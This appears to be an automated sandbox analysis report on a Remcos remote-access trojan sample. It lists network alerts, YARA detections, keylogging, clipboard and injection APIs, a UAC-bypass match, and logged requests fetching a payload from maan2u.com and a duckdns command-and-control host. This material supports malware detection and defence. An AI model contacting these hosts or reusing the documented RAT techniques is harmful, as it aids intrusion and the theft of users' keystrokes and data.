                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0300BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0300BD72
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F97CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,7_2_02F97CD2

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49706 -> 192.161.184.44:2468
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: https://maan2u.com/doc/233_Qzzgbhhaaml
                    Source: Malware configuration extractorURLs: apostlejob2.duckdns.org
                    Uses dynamic DNS services
                    Source: unknownDNS query: name: apostlejob2.duckdns.org
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0290E4B8 InternetCheckConnectionA,0_2_0290E4B8
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                    Source: Joe Sandbox ViewASN Name: TMVADS-APTM-VADSDCHostingMY TMVADS-APTM-VADSDCHostingMY
                    Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49707 -> 178.237.33.50:80
                    Source: global trafficHTTP traffic detected: GET /doc/233_Qzzgbhhaaml HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: maan2u.com
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FAB411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,7_2_02FAB411
                    Source: global trafficHTTP traffic detected: GET /doc/233_Qzzgbhhaaml HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: maan2u.com
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: maan2u.com
                    Source: global trafficDNS traffic detected: DNS query: apostlejob2.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                    Source: SndVol.exeString found in binary or memory: http://geoplugin.net/json.gp
                    Source: colorcpl.exe, 00000007.00000003.2139804062.0000000000768000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4510115069.0000000000768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp(
                    Source: XjPA2pnUhC.exe, 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: colorcpl.exe, 00000007.00000003.2139804062.0000000000768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpJ
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                    Source: colorcpl.exe, 00000007.00000003.2139804062.0000000000768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpW
                    Source: colorcpl.exe, 00000007.00000003.2139804062.0000000000768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl#
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                    Source: XjPA2pnUhC.exe, XjPA2pnUhC.exe, 00000000.00000002.2130796963.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
                    Source: XjPA2pnUhC.exe, 00000000.00000002.2116974207.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maan2u.com/
                    Source: XjPA2pnUhC.exe, 00000000.00000002.2121681113.00000000028C3000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2116974207.0000000000608000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maan2u.com/doc/233_Qzzgbhhaaml
                    Source: XjPA2pnUhC.exe, 00000000.00000002.2116974207.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maan2u.com:443/doc/233_Qzzgbhhaaml
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknownHTTPS traffic detected: 112.137.173.77:443 -> 192.168.2.5:49705 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F9A2F3 SetWindowsHookExA 0000000D,02F9A2DF,000000007_2_02F9A2F3
                    Installs a global keyboard hook
                    Source: C:\Windows\SysWOW64\colorcpl.exeWindows user hook set: 0 keyboard low level C:\Windows\SysWOW64\colorcpl.exeJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F9B749 OpenClipboard,GetClipboardData,CloseClipboard,7_2_02F9B749
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FA68FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_02FA68FC
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028968FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,10_2_028968FC
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_030168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_030168FC
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F9B749 OpenClipboard,GetClipboardData,CloseClipboard,7_2_02F9B749
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F9A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,7_2_02F9A41B
                    Source: Yara matchFile source: 10.2.SndVol.exe.2880000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SndVol.exe.2880000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.colorcpl.exe.2f90000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.colorcpl.exe.2f90000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.SndVol.exe.3000000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.SndVol.exe.3000000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.XjPA2pnUhC.exe.28f0000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: XjPA2pnUhC.exe PID: 2780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 2684, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 1520, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 1200, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 10.2.SndVol.exe.2880000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SndVol.exe.2880000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.colorcpl.exe.2f90000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.colorcpl.exe.2f90000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.SndVol.exe.3000000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.SndVol.exe.3000000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.XjPA2pnUhC.exe.28f0000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.4510115069.0000000000791000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.4510318610.0000000000CFF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.4510115069.0000000000728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2251996048.000000001F0E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2330151215.000000002B797000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: XjPA2pnUhC.exe PID: 2780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 2684, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 1520, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 1200, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Contains functionalty to change the wallpaper
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FACA73 SystemParametersInfoW,7_2_02FACA73
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_0289CA73 SystemParametersInfoW,10_2_0289CA73
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0301CA73 SystemParametersInfoW,12_2_0301CA73

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 10.2.SndVol.exe.2880000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 10.2.SndVol.exe.2880000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 10.2.SndVol.exe.2880000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 10.2.SndVol.exe.2880000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 10.2.SndVol.exe.2880000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 10.2.SndVol.exe.2880000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 7.2.colorcpl.exe.2f90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 7.2.colorcpl.exe.2f90000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 7.2.colorcpl.exe.2f90000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 7.2.colorcpl.exe.2f90000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 7.2.colorcpl.exe.2f90000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 7.2.colorcpl.exe.2f90000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.SndVol.exe.3000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 12.2.SndVol.exe.3000000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 12.2.SndVol.exe.3000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.SndVol.exe.3000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 12.2.SndVol.exe.3000000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 12.2.SndVol.exe.3000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.XjPA2pnUhC.exe.28f0000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.XjPA2pnUhC.exe.28f0000.7.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: Process Memory Space: XjPA2pnUhC.exe PID: 2780, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: colorcpl.exe PID: 2684, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: SndVol.exe PID: 1520, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: SndVol.exe PID: 1200, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Windows\SysWOW64\colorcpl.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_02908730 NtQueueApcThread,0_2_02908730
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_02907A2C NtAllocateVirtualMemory,0_2_02907A2C
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0290DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_0290DC8C
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0290DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_0290DC04
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0290DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_0290DD70
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_02907D78 NtWriteVirtualMemory,0_2_02907D78
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_02908D70 GetThreadContext,SetThreadContext,NtResumeThread,0_2_02908D70
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_02908D6E GetThreadContext,SetThreadContext,NtResumeThread,0_2_02908D6E
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_02907A2A NtAllocateVirtualMemory,0_2_02907A2A
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0290DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_0290DBB0
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 9_2_028C8730 NtQueueApcThread,9_2_028C8730
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 9_2_028C7A2C NtAllocateVirtualMemory,9_2_028C7A2C
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 9_2_028C7D78 NtWriteVirtualMemory,9_2_028C7D78
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 9_2_028CDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,9_2_028CDD70
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 9_2_028C7A2A NtAllocateVirtualMemory,9_2_028C7A2A
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 9_2_028CDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,9_2_028CDBB0
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 9_2_028CDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,9_2_028CDC8C
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 9_2_028CDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,9_2_028CDC04
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 9_2_028C8D6E GetThreadContext,SetThreadContext,NtResumeThread,9_2_028C8D6E
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 9_2_028C8D70 GetThreadContext,SetThreadContext,NtResumeThread,9_2_028C8D70
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_02908788 CreateProcessAsUserW,0_2_02908788
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FA67EF ExitWindowsEx,LoadLibraryA,GetProcAddress,7_2_02FA67EF
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028967EF ExitWindowsEx,LoadLibraryA,GetProcAddress,10_2_028967EF
